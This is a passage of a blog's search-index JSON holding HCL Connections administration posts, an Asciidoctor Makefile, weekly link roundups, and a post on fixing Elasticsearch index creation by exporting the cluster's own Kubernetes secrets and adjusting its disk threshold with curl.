Portal for HCL Connections .\nCustomized newsletter with direct action Summary I made all tests with HCL Connections 7 installed with Connections-Automation Ansible repository . I doublechecked and the error/missing link appeared already with Connections 6.5 (no older version to check).\n","excerpt":"\u003cp\u003eSince IBM Connections 6.0CR4 we can use a new newsletter format which needs still (now with HCL Connections 7) be activated separately in \u003ccode\u003eLotusConnections-config/notification-config.xml\u003c/code\u003e.\u003c/p\u003e\n\u003cp\u003eToday some users asked how they can add other users to their private communities (visible in Community catalog) without manually adding them.\nAs we investigated the question I had a look at the old notification format.\u003c/p\u003e","ref":"https://stoeps.de/posts/2021/newsletter_v2/","title":"HCL Connections Newsletter v2 and Join Community requests"},{"body":"Still no traveling or conferences possible, so I recorded one video for OpenNTF , which seems to have a color problem in the end. Hope it is still useful to start with Ansible.\nOpenNTF Introduction to Ansible for Newbies ","excerpt":"\u003cp\u003eStill no traveling or conferences possible, so I recorded one video for \u003ca href=\"https://www.openntf.org\" target=\"_blank\"\u003eOpenNTF \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, which seems to have a color problem in the end. Hope it is still useful to start with Ansible.\u003c/p\u003e\n\u003ch2 id=\"openntf\"\u003eOpenNTF \u003ca href=\"#openntf\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://youtu.be/dQcN7lHvj94\" target=\"_blank\"\u003eIntroduction to Ansible for Newbies \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \n \u003ci class=\"las la-video la-2x align-middle\"\u003e\u003c/i\u003e\n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e","ref":"https://stoeps.de/speaking/2021/","title":"Talks 2021"},{"body":"Since the update to the new HCL Connections Community Card-Based Overview (Connections 6.0 CR4) I search for a way to hide the button \u0026ldquo;Create Community\u0026rdquo; from users without the role \u0026ldquo;Community-Creator\u0026rdquo;. This was always possible in the earlier versions of Connections, but the button was shown always since the update.\nDuring the year I mostly forgot about it, but yesterday I opened a case with HCL Connections Support and got immediatly following answer:\nThere is a new gatekeeper flag, CATALOG_CARD_UPDATED, which was introduced in IC6.0CR5 to help enhance the community card based view. This will need to be set to false to address this issue. You can perform the below steps to address this.\n(1) Login to the below Connections url as the user mapped to the admin role for the Common application.\nYou can check the user mapped to this role from WAS console, Apps \u0026gt; Common \u0026gt; Security role to user/group mapping \u0026gt; admin\nhttps://\u0026lt;your_connections_server\u0026gt;/connections/config/highway.main.gatekeeper.tiles[]\n(2) Locate the CATALOG_CARD_UPDATED setting and change it from true to false.\n(3) Save the setting\n(4) Restart the Communities application\nHCL Support To make it short, this works perfectly as described. Now the button is not visible for users without the community-creator role.\nHCL is planning a technote on this, I will update the post and add the url when it is available. Thanks to HCL for the fast solution and that I\u0026rsquo;m allowed to publish it already.\nAfaik changing settings in /connections/config should only be made after advice from Support. Other changes are unsupported.\nUpdate from 2021-11-18 Please check Hiding the Create Community button 2nd for the latest updates on the usage of CATALOG_CARD_UPDATED.\n","excerpt":"\u003cp\u003eSince the update to the new \u003ca href=\"https://help.hcltechsw.com/connections/v6/user/communities/t_com_search.html\" target=\"_blank\"\u003eHCL Connections Community Card-Based Overview (Connections 6.0 CR4) \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n I search for a way to hide the button \u0026ldquo;Create Community\u0026rdquo; from users without the role \u0026ldquo;Community-Creator\u0026rdquo;.\nThis was always possible in the earlier versions of Connections, but the button was shown always since the update.\u003c/p\u003e\n\u003cp\u003eDuring the year I mostly forgot about it, but yesterday I opened a case with HCL Connections Support and got immediatly following answer:\u003c/p\u003e","ref":"https://stoeps.de/posts/2020/community_create_button/","title":"Show Community Create Button only to users with role \"community-creator\""},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/asciidoctor/","title":"Asciidoctor"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/make/","title":"Make"},{"body":"I write most of my documents (blog posts, documentation, recipes and so on) with Asciidoctor . Everything is organized in Git repositories.\nDuring GPN 19 (Gulaschprogrammiernacht) I showed how to build html and pdf with a Gitlab CI/CD pipeline . That’s quite handy, but lots of documents I build, I just need locally.\nSo today I played with WSL2 and a Makefile to build all Asciidoctor files in a directory.\nCommandline to make pdf\nasciidoctor-pdf source.adoc -o build/source.pdf This builds a pdf in the directory build, but how can we create a pdf of some files?\nMakefile\ndocs = $(wildcard *.adoc) pdfs = $(docs:.adoc=.pdf) all: $(pdfs) .PHONY: all # Call asciidoctor to generate $@ from $^ %.pdf: %.adoc asciidoctor-pdf $^ -o build/$@ Wildcard of all files with extension adoc in this directory\nMap .pdf instead of .adoc\nRun on all targets\n$@ is the PDF-File,\n$^ is the Source\nSo just running make will create all documents converted in pdf.\nExtend the Makefile Create all documents converted to html and pdf in extra folders. Add commandline option variable.\nMakefile\ndocs := $(wildcard *.adoc) pdfs := $(docs:.adoc=.pdf) htmls := $(docs:.adoc=.html) options := -a toc -a toclevels=\u0026#34;1\u0026#34; all: html pdf pdf: $(pdfs) html: $(htmls) .PHONY: all pdf html # Call asciidoctor to generate $@ from $^ %.pdf: %.adoc asciidoctor-pdf $^ $(options) -o build/pdf/$@ %.html: %.adoc asciidoctor $^ $(options) -o build/html/$@ So now running make creates html and pdf targets.\nYou can use this Makefile on Linux, Mac OS or Windows (with WSL) to convert a large scale of Asciidoctor files to your target.\n","excerpt":"\u003cp\u003eI write most of my documents (blog posts, documentation, recipes and so on) with \u003ca href=\"https://asciidoctor.org\" target=\"_blank\"\u003eAsciidoctor \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\nEverything is organized in Git repositories.\u003c/p\u003e\n\u003cp\u003eDuring \u003ca href=\"https://entropia.de/GPN19\" target=\"_blank\"\u003eGPN 19 (Gulaschprogrammiernacht) \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n I showed how to build html and pdf with a \u003ca href=\"https://gitlab.com/stoeps/gpn19-documentation\" target=\"_blank\"\u003eGitlab CI/CD pipeline \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\nThat’s quite handy, but lots of documents I build, I just need locally.\u003c/p\u003e\n\u003cp\u003eSo today I played with WSL2 and a Makefile to build all Asciidoctor files in a directory.\u003c/p\u003e","ref":"https://stoeps.de/posts/2020/makefile_for_adoc/","title":"Makefile to process all Asciidoctor files in a directory"},{"body":"","excerpt":"","ref":"https://stoeps.de/categories/markup/","title":"Markup"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/touchpoint/","title":"Touchpoint"},{"body":"Some weeks ago I wrote about an workaround to prevent TDI from deleting the touchpoint status in HCL Connections .\nDuring some research on TDI I found Mapping fields manually in the HCL Connections documentations. This document describes how to add additional fields to the TDI synchronisation. On point 11 I found something new for me. You can add additional fields and then add the content with an Javascript function for example.\nThen TDI does not make an LDAP call to get the attribute from there, instead it uses the function. So an additional workaround for the Touchpoint state problem is to add the five fields defined in conf/LotusConnections-conf/tdi-profiles-config.xml to map_dbrepos_from_source.properties and set it to null. Setting attributes to null does not delete the content in the database, but just does nothing (no update, no creation).\nExample: add this to the end of your map_dbrepos_from_source.properties\nextattr.recommendedTags=null extattr.departmentKey=null extattr.privacyAndGuidelines=null extattr.touchpointState=null extattr.touchpointSession=null That’s way easier than commenting out the field definitions and if you ever need to set the fields, you can just add the attribute or function to map_dbrepos_from_source.properties.\nHave a look at the update from 17.08.2022 some lines below, this will fix the issue with only small adjustments.\n## Update 10.05.2021\nI’m really sorry, but this workaround seems not to work as expected.\nSo the best way, that the touchpointState is not overwritten on each TDI run is to comment out the fields in tdisol/conf/LotusConnections-config/profiles-types.xml and tdisol/conf/LotusConnections-config/TDI-LotusConnections-config.xml!\nUpdate 17.08.2022 With Connections 7.0 CFix.70.2206 the issue is still not fixed! So each time when sync_all_dns.sh is running and a user has touchpointState set in EMPINST.PROFILE_EXTENSIONS it gets deleted. I have no environment, where the touchpointState is written or read from LDAP.\nAs I wrote in the original article you can uncomment the lines in conf/LotusConnections-config/tdi-profiles-config.xml, but then you need to remove the field definition in conf/LotusConnections-config/profiles-types.xml too.\nFrom my point of view the fastest fix for this is to remove the sourceKey from tdi-profiles-config.xml:\nOriginal definition:\n38 39 40 41 42 \u0026lt;simpleAttribute extensionId=\u0026#34;recommendedTags\u0026#34; length=\u0026#34;256\u0026#34; sourceKey=\u0026#34;recommendedTags\u0026#34; /\u0026gt; \u0026lt;simpleAttribute extensionId=\u0026#34;departmentKey\u0026#34; length=\u0026#34;256\u0026#34; sourceKey=\u0026#34;departmentKey\u0026#34; /\u0026gt; \u0026lt;simpleAttribute extensionId=\u0026#34;privacyAndGuidelines\u0026#34; length=\u0026#34;256\u0026#34; sourceKey=\u0026#34;privacyAndGuidelines\u0026#34; /\u0026gt; \u0026lt;simpleAttribute extensionId=\u0026#34;touchpointState\u0026#34; length=\u0026#34;256\u0026#34; sourceKey=\u0026#34;touchpointState\u0026#34; /\u0026gt; \u0026lt;richtextAttribute extensionId=\u0026#34;touchpointSession\u0026#34; maxBytes=\u0026#34;1000000\u0026#34; sourceKey=\u0026#34;touchpointSession\u0026#34; /\u0026gt; Change to:\n35 36 37 38 39 40 41 42 \u0026lt;!-- These extension attributes are required by the \u0026#39;Touchpoint\u0026#39; component --\u0026gt; \u0026lt;simpleAttribute extensionId=\u0026#34;recommendedTags\u0026#34; length=\u0026#34;256\u0026#34; /\u0026gt; \u0026lt;simpleAttribute extensionId=\u0026#34;departmentKey\u0026#34; length=\u0026#34;256\u0026#34; /\u0026gt; \u0026lt;simpleAttribute extensionId=\u0026#34;privacyAndGuidelines\u0026#34; length=\u0026#34;256\u0026#34; /\u0026gt; \u0026lt;simpleAttribute extensionId=\u0026#34;touchpointState\u0026#34; length=\u0026#34;256\u0026#34; /\u0026gt; \u0026lt;richtextAttribute extensionId=\u0026#34;touchpointSession\u0026#34; maxBytes=\u0026#34;1000000\u0026#34; /\u0026gt; This allows the field in profiles, but does not read the state from LDAP. As I have node of the five attributes in LDAP, I removed the sourceKey from all attribute definitions.\n","excerpt":"\u003cp\u003eSome weeks ago I wrote about an \u003ca href=\"/posts/2020/touchpointinhclcnx/\"\u003eworkaround to prevent TDI from deleting the touchpoint status in HCL Connections\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eDuring some research on TDI I found \u003ca href=\"https://help.hcltechsw.com/connections/v6/admin/install/t_prof_tdi_mapfields.html?hl=extattr\" target=\"_blank\"\u003eMapping fields manually \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n in the HCL Connections documentations.\nThis document describes how to add additional fields to the TDI synchronisation.\nOn point 11 I found something new for me. You can add additional fields and then add the content with an Javascript function for example.\u003c/p\u003e","ref":"https://stoeps.de/posts/2020/touchpointupdate/","title":"Update on the Touchpoint workaround (Updated)"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/2020/","title":"2020"},{"body":"","excerpt":"","ref":"https://stoeps.de/categories/linkdump/","title":"Linkdump"},{"body":"Last week I didn\u0026rsquo;t find very useful links to read or articles to share. This week I read more books, so a recommendation for a book this week and two articles with awk basics.\nhttps://www.packtpub.com/product/the-kubernetes-workshop/9781838820756[The Kubernetes Workshop icon:external-link[], window=_blank]:: Still preparing for CKA, so I read a lot around Kubernetes. This book is brand new and the first chapters are already useful. I think it\u0026rsquo;s more detailled than the books I read about Kubernetes before.\nhttps://blog.intigriti.com/2020/10/28/bug-bytes-94-breaking-symfony-apps-why-cyber-security-is-so-hard-to-learn-how-best-to-approach-it/[Bug Bytes #94 - Breaking Symfony apps, Why Cyber Security is so hard to learn \u0026amp; how best to approach it - Intigriti icon:external-link[], window=_blank]:: Again a great collection of things worth reading all around bug bounty and pentesting.\nhttps://youtu.be/-bcWZQCLk_4[Derbycon - The Unintended Risks of Trusting Active Directory icon:external-link[], window=_blank]:: This time a video, I haven\u0026rsquo;t watched it completly until now, but I scrolled through the slide deck and think it is worth watching.\nhttps://jemma.dev/blog/awk-part-2[awk : END { \u0026hellip; icon:external-link[], window=_blank]:: If you’ve already read my first post about awk, thanks for reading this one too! If not, that’s probably a better place to start.\nhttps://jemma.dev/blog/awk-part-1[awk : BEGIN { \u0026hellip; icon:external-link[], window=_blank]:: The other day, I was watching Bryan Cantrill’s 2018 talk, Rust, and Other Interesting Things, and he made an offhanded comment while discussing values of different programming languages and communities. He said, “If you get the awk programming language manual…you’ll read it in about two hours and then you’re done. That’s it. You know all of awk.”\n","excerpt":"\u003cp\u003eLast week I didn\u0026rsquo;t find very useful links to read or articles to share. This week I read more books, so a recommendation for a book this week and two articles with \u003ccode\u003eawk\u003c/code\u003e basics.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://www.packtpub.com/product/the-kubernetes-workshop/9781838820756[The\" target=\"_blank\"\u003ehttps://www.packtpub.com/product/the-kubernetes-workshop/9781838820756[The \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n Kubernetes Workshop   icon:external-link[], window=_blank]:: Still preparing for CKA, so I read a lot around Kubernetes. This book is brand new and the first chapters are already useful. I think it\u0026rsquo;s more detailled than the books I read about Kubernetes before.\u003c/p\u003e","ref":"https://stoeps.de/posts/2020/linkdump_44_2020/","title":"Linkdump Week 44 / 2020"},{"body":"https://mkaz.blog/working-with-vim/vimwiki/[VimWiki – Working with Vim – mkaz.blog icon:external-link[], window=_blank]:: I switched for daily notes and diary entries to Vimwiki. I like the fast access and combine it with gollum to display in the browser. In the article you find shortcuts and tipps for working with the todo function.\nhttps://cloudberry.engineering/article/dockerfile-security-best-practices/[Dockerfile Security Best Practices - Cloudberry Engineering icon:external-link[], window=_blank]:: Container security is a broad problem space and there are many low hanging fruits one can harvest to mitigate risks. A good starting point is to follow some rules when writing Dockerfiles.\nhttps://www.elastic.co/blog/how-many-shards-should-i-have-in-my-elasticsearch-cluster[How many shards should I have in my Elasticsearch cluster? icon:external-link[], window=_blank]:: If you are looking for practical guidelines around how many indices and shards to have in your cluster, this blog post will help you avoid common pitfalls.\nhttps://alvinalexander.com//unix/edu/examples/grep.shtml[A BIG collection of Unix/Linux ‘grep’ command examples icon:external-link[], window=_blank]:: Some very useful examples for grep\nhttps://blog.intigriti.com/2020/10/14/bug-bytes-92-pwning-apple-for-three-months-xss-in-vuejs-hacking-salesforce-lightning-unicode-by%CD%A5tes/[Bug Bytes #92 - Pwning Apple for three months, XSS in VueJS, Hacking Salesforce Lightning \u0026amp; Unicode byͥtes - Intigriti icon:external-link[], window=_blank]:: Bug Bytes is a weekly newsletter curated by members of the bug bounty community. The first series is curated by Mariem, better known as PentesterLand. Every week, she keeps us up to date with a comprehensive list of write-ups, tools, tutorials and resources. This issue covers the week from 04 to 11 of October. Intigriti […]\nhttps://github.com/aceking007/Byte-Sized-Code[A collection of Jupyter notebooks for learning Python from the ground up. icon:external-link[], window=_blank]:: A collection of Jupyter notebooks for learning Python from the ground up. - aceking007/Byte-Sized-Code\nhttps://github.com/dastergon/postmortem-templates[A collection of postmortem templates icon:external-link[], window=_blank]:: Postmortem templates\nhttps://github.com/danluu/post-mortems[A collection of postmortems icon:external-link[], window=_blank]:: Good source to write postmortems.\n","excerpt":"\u003cp\u003e\u003ca href=\"https://mkaz.blog/working-with-vim/vimwiki/[VimWiki\" target=\"_blank\"\u003ehttps://mkaz.blog/working-with-vim/vimwiki/[VimWiki \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n – Working with Vim – mkaz.blog   icon:external-link[], window=_blank]:: I switched for daily notes and diary entries to Vimwiki. I like the fast access and combine it with gollum to display in the browser. In the article you find shortcuts and tipps for working with the todo function.\u003c/p\u003e","ref":"https://stoeps.de/posts/2020/linkdump_42_2020/","title":"Linkdump Week 42 / 2020"},{"body":"Another week is over, for a quite busy one. I\u0026rsquo;m still working on automating HCL Connections installation and think about creating pytests for these deployments. So here is the this weeks mix of my bookmarks, tools I used and articles I found interesting.\nhttps://wizardzines.com/comics/bash-errors/[BASH errorhandling - wizard zines icon:external-link[], window=_blank]:: Good intro on Bash errorhandling from Julia Evans\nhttp://blog.cretaria.com/posts/bye-bye-apple.html[Bye-bye Apple icon:external-link[], window=_blank]:: Very interesting post, I did that move years ago. I started using Linux on a daily basis on my work notebook around 2008. Sometimes parallel with Mac OS. Today I think about switching my Lenovo notebook to OpenBSD, but I need to work with different business tools for meetings, remote access and so on. So I will first build a test environment. Maybe it is time to write a \u0026ldquo;tools I use\u0026rdquo; article.\nhttps://www.digitalocean.com/community/tutorials/how-to-inspect-kubernetes-networking[How To Inspect Kubernetes Networking icon:external-link[], window=_blank]:: Kubernetes is a container orchestration system that can manage containerized applications across a cluster of server nodes. Maintaining network connectivity between all the containers in a cluster requires some advanced networking techniques.\nhttps://github.com/eldadru/ksniff[Kubectl plugin to ease sniffing on kubernetes pods using tcpdump and wireshark icon:external-link[], window=_blank]:: A kubectl plugin that utilize tcpdump and Wireshark to start a remote capture on any pod in your Kubernetes cluster. You get the full power of Wireshark with minimal impact on your running pods. Easier to implement than using sidecars.\nhttps://samcurry.net/hacking-apple/[We Hacked Apple for 3 Months: Here’s What We Found icon:external-link[], window=_blank]:: Very interesting article about the Apple bugbounty program and vulnerabilities.\nhttps://www.ansible.com/resources/webinars-training/ansible-tower-basics-workflows[Ansible Tower Basics: Workflows icon:external-link[], window=_blank]:: Interesting introduction into AWX the free version of Ansible Tower.\nhttps://blog.intigriti.com/2020/10/07/bug-bytes-91-the-shortest-domain-weird-facebook-authentication-bypass-github-actions-secrets/[Bug Bytes #91 - The shortest domain, Weird Facebook authentication bypass \u0026amp; GitHub Actions secrets - Intigriti icon:external-link[], window=_blank]:: Bug Bytes is a weekly newsletter curated by members of the bug bounty community. The first series is curated by Mariem, better known as PentesterLand. Every week, she keeps us up to date with a comprehensive list of write-ups, tools, tutorials and resources.\nhttps://keystore-explorer.org/[KeyStore Explorer icon:external-link[], window=_blank]:: KeyStore Explorer is an open source GUI replacement for the Java command-line utilities keytool and jarsigner. KeyStore Explorer presents their functionality, and more, via an intuitive graphical user interface.\nhttps://miguendes.me/7-pytest-features-and-plugins-that-will-save-you-tons-of-time-ckfsjlr8y02axv6s1f8is1pgh[7 pytest Features and Plugins That Will Save You Tons of Time icon:external-link[], window=_blank]:: In this tutorial, we\u0026rsquo;ll learn the best pytest features and plugins to speed up your development process. They\u0026rsquo;re very simple and you can start using them right away.\n","excerpt":"\u003cp\u003eAnother week is over, for a quite busy one. I\u0026rsquo;m still working on automating HCL Connections installation and think about creating pytests for these deployments. So here is the this weeks mix of my bookmarks, tools I used and articles I found interesting.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://wizardzines.com/comics/bash-errors/[BASH\" target=\"_blank\"\u003ehttps://wizardzines.com/comics/bash-errors/[BASH \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n errorhandling - wizard zines   icon:external-link[], window=_blank]:: Good intro on Bash errorhandling from Julia Evans\u003c/p\u003e","ref":"https://stoeps.de/posts/2020/linkdump_41_2020/","title":"Linkdump Week 41 / 2020"},{"body":"Today I activated Elasticsearch Metrics and Typeahead Search on my demo HCL Connections cluster .\nTo my surprise the indices weren’t created and I got errors on the wsadmin.sh commands.\nSearchService.createESQuickResultsIndex() I checked the Elasticsearch pods which showed a running state, but the logs showed following messages:\n[es-master-c9cc5d877-trwsd es-master] [2020-10-08T12:11:13,708][WARN ][o.e.c.r.a.DiskThresholdMonitor] \\ [es-master-c9cc5d877-trwsd] high disk watermark [90%] exceeded on [sqwY58MtRa2MoPkHr1o70Q][es-data-2][/data/data/nodes/0] \\ free: 2.7gb[5.4%], shards will be relocated away from this node So even with 2.7GB free space it does not generate the needed shards and indices. This is default behavior of Elasticsearch , but can be changed :\ncurl -XPUT \u0026#34;http://es-host:9200/_cluster/settings\u0026#34; \\ -H \u0026#39;Content-Type: application/json\u0026#39; -d\u0026#39; { \u0026#34;persistent\u0026#34;: { \u0026#34;cluster\u0026#34;: { \u0026#34;routing\u0026#34;: { \u0026#34;allocation.disk.threshold_enabled\u0026#34;: false } } } }\u0026#39; I’m pretty sure I will need this in customer environments too, because on big NFS clusters 10% disks can be equal to some hundred GB diskspace.\nBUT this will not work with the Elasticsearch pods of HCL Connections Componentpack, because it is secured with Secureguard and you need to have a client SSL certificate for authentication.\nConnect to Elasticsearch on the Componentpack Kubernetes Cluster During the setup of Elasticsearch metrics, you export the keystore and ca keys from Kubernetes secrets:\nkubectl get secret elasticsearch-secret -n connections -o=jsonpath=\u0026#34;{.data[\u0026#39;chain-ca\\.pem\u0026#39;]}\u0026#34; | base64 -d \u0026gt; chain-ca.pem kubectl get secret elasticsearch-secret -n connections -o=jsonpath=\u0026#34;{.data[\u0026#39;elasticsearch-metrics\\.p12\u0026#39;]}\u0026#34; | base64 -d \u0026gt; elasticsearch-metrics.p12 We can import the elasticssearch-metrics.p12 to our browser and it will use the include certificate to connect to the elasticsearch server.\nSo accessing https://kubernetes-node:30099/_cat/indices will show you all available indices and their status, after you imported the keystore.\nTo use the adminkeys, we need to export two additional keys:\nkubectl get secret elasticsearch-secret -n connections -o=jsonpath=\u0026#34;{.data[\u0026#39;elasticsearch-admin\\.key\u0026#39;]}\u0026#34; | base64 -d \u0026gt; elasticsearch-admin.key kubectl get secret elasticsearch-secret -n connections -o=jsonpath=\u0026#34;{.data[\u0026#39;elasticsearch-admin\\.crt\\.pem\u0026#39;]}\u0026#34; | base64 -d \u0026gt; elasticsearch-admin.crt.pem Check Server settings\ncurl --key elasticsearch-admin.key --cert elasticsearch-admin.crt.pem -k --cacert chain-ca.pem -XGET \u0026#34;https://cnx651-k8s-node1.stoeps.internal:30099/_cluster/settings\u0026#34; Enter PEM pass phrase: {\u0026#34;persistent\u0026#34;:{},\u0026#34;transient\u0026#34;:{}} Now we can connect with curl and disable the threshold\ncurl --key elasticsearch-admin.key --cert elasticsearch-admin.crt.pem -k --cacert chain-ca.pem -XPUT \u0026#34;https://cnx651-k8s-node1.stoeps.internal:30099/_cluster/settings\u0026#34; \\ -H \u0026#39;Content-Type: application/json\u0026#39; -d\u0026#39; { \u0026#34;persistent\u0026#34;: { \u0026#34;cluster\u0026#34;: { \u0026#34;routing\u0026#34;: { \u0026#34;allocation.disk.threshold_enabled\u0026#34;: false } } } }\u0026#39; Enter PEM pass phrase: {\u0026#34;acknowledged\u0026#34;:true,\u0026#34;persistent\u0026#34;:{\u0026#34;cluster\u0026#34;:{\u0026#34;routing\u0026#34;:{\u0026#34;allocation\u0026#34;:{\u0026#34;disk\u0026#34;:{\u0026#34;threshold_enabled\u0026#34;:\u0026#34;false\u0026#34;}}}}},\u0026#34;transient\u0026#34;:{}}% Use the password from you Componentpack setup If you can’t remember the password, use this command:\nkubectl get secret elasticsearch-secret -n connections -o=jsonpath=\u0026#34;{.data[\u0026#39;elasticsearch-key-password\\.txt\u0026#39;]}\u0026#34; | base64 -d password Check setting You can open the url with your browser (where you imported the keystore), or use curl again:\ncurl --key elasticsearch-admin.key --cert elasticsearch-admin.crt.pem -k --cacert chain-ca.pem -XGET \u0026#34;https://cnx651-k8s-node1.stoeps.internal:30099/_cluster/settings\u0026#34; Enter PEM pass phrase: {\u0026#34;persistent\u0026#34;:{\u0026#34;cluster\u0026#34;:{\u0026#34;routing\u0026#34;:{\u0026#34;allocation\u0026#34;:{\u0026#34;disk\u0026#34;:{\u0026#34;threshold_enabled\u0026#34;:\u0026#34;false\u0026#34;}}}}},\u0026#34;transient\u0026#34;:{}} See logs of all Elasticsearch pods Download kubetail kubetail -l component=elasticsearch -n connections During my tests, I checked `elasticsearch-metrics.p12\u0026rsquo; with https://keystore-explorer.org and found, that the client key is only valid for two years. So we need to remember to update this (or hope that HCL will provide us with an update and documentation on this topic).\nOr check the imported certificate in the browser.\nWhy is this important? During the setup we had to import the keystore to WebSphere and copy it to all WebSphere nodes! I will not update automatically.\n","excerpt":"\u003cp\u003eToday I activated \u003ca href=\"https://help.hcltechsw.com/connections/v65/admin/install/cp_config_es_migrate_cognos_data.html\" target=\"_blank\"\u003eElasticsearch Metrics \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n and \u003ca href=\"https://help.hcltechsw.com/connections/v65/admin/install/inst_managing_es_index_cnx_typeahead_search.html\" target=\"_blank\"\u003eTypeahead Search \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n on my demo \u003ca href=\"https://www.hcltechsw.com/products/connections\" target=\"_blank\"\u003eHCL Connections cluster \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eTo my surprise the indices weren’t created and I got errors on the \u003ccode\u003ewsadmin.sh\u003c/code\u003e commands.\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eSearchService.createESQuickResultsIndex()\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003eI checked the Elasticsearch pods which showed a running state, but the logs showed following messages:\u003c/p\u003e","ref":"https://stoeps.de/posts/2020/elasticsearch/","title":"Elasticsearch index creation problem"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/git/","title":"Git"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/hacktoberfest/","title":"Hacktoberfest"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/intigriti/","title":"Intigriti"},{"body":"It is Linkdump time again. I fixed some things during the week, so my https://github.com/Shaarli/Shaarli[Shaarli instance] can use the API now. I do a lot of research and reading on mobile devices (tablet and phone). Now I can share important articles through https://stakali.toneiv.eu/[Stakali] , add short notes and do followups on my other devices (tablet, computer). To automate the linkdump posts, I created a short https://gitlab.com/stoeps/shaarli2hugo[Python script to collect my saved bookmarks] (marked with the tag linkdump) and create an asccidoc document for my hugo instance. So I can do a quick review and post it.\nShaarli creates a https://shaarli.stoeps.de/?do=daily[daily overview] and a https://shaarli.stoeps.de/?do=tagcloud[tag cloud] of saved bookmarks.\nhttps://joel.net/how-one-guy-ruined-hacktoberfest2020-drama[How One Guy Ruined #Hacktoberfest2020 #Drama icon:external-link[], window=_blank]:: Hacktoberfest If you aren\u0026rsquo;t familar, Hacktoberfest is an annual eventthat occurs every October. It is held by Digital Ocean and encouragesdevelopers to submit Pull Requests to Open Source repositories and as areward you get a T-Shirt. A good idea from Digitalocean, this time Github is flooded with a lot of tiny spam PR.\nhttps://blog.intigriti.com/2020/09/30/bug-bytes-90-the-impossible-xss-burp-pro-tips-a-millionaire-on-bug-bounty-and-meditation/[Bug Bytes #90 - The impossible XSS, Burp Pro tips \u0026amp; A millionaire on bug bounty and meditation - Intigriti icon:external-link[], window=_blank]:: __Bug Bytes is a weekly newsletter curated by members of the bug bounty community. The first series is curated by Mariem, better known as PentesterLand. Every week, she keeps us up to date with a comprehensive list of write-ups, tools, tutorials and resources. This issue covers the week from 18 to 25 of September. Our […]__Huge collection of links to articles, podcasts and videos from the infosec and bugbounty community\nhttps://www.lambdatest.com/blog/test-automation-using-pytest-and-selenium-webdriver/[Test Automation Using Pytest and Selenium WebDriver icon:external-link[], window=_blank]:: __Pytest is test framework used to make simple, yet scalable test case swith ease. Let\u0026rsquo;s learn how to Automate test process using Pytest and Selenium WebDriver.__I used unittest and selenium before, but heared that pytest is newer and the better approach. I\u0026rsquo;m in the beginning of building tests for HCL Connections and will check if pytest is really better or easier than unittest.\nhttps://matrix.org/blog/2020/09/30/welcoming-gitter-to-matrix[Welcoming Gitter to Matrix! icon:external-link[], window=_blank]:: https://gitlab.com [Gitlab] sold https://gitter.im/[Gitter] tohttps://matrix.org[Matrix] this week.I think both projects can benefit from this. In the moment I like Gitter more, but when the teams merge features it gets even better.\nhttps://gitlab.com/stoeps/shaarli2hugo[shaarli2hugo icon:external-link[], window=_blank]:: Automation script to prepare shared Shaarli bookmark collections on aHugo blog.\n","excerpt":"\u003cp\u003eIt is Linkdump time again.\nI fixed some things during the week, so my \u003ca href=\"https://github.com/Shaarli/Shaarli[Shaarli\" target=\"_blank\"\u003ehttps://github.com/Shaarli/Shaarli[Shaarli \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n instance] can use the API now.\nI do a lot of research and reading on mobile devices (tablet and phone).\nNow I can share important articles through \u003ca href=\"https://stakali.toneiv.eu/[Stakali]\" target=\"_blank\"\u003ehttps://stakali.toneiv.eu/[Stakali] \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, add short notes and do followups on my other devices (tablet, computer).\nTo automate the linkdump posts, I created a short \u003ca href=\"https://gitlab.com/stoeps/shaarli2hugo[Python\" target=\"_blank\"\u003ehttps://gitlab.com/stoeps/shaarli2hugo[Python \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n script to collect my saved bookmarks] (marked with the tag linkdump) and create an asccidoc document for my hugo instance.\nSo I can do a quick 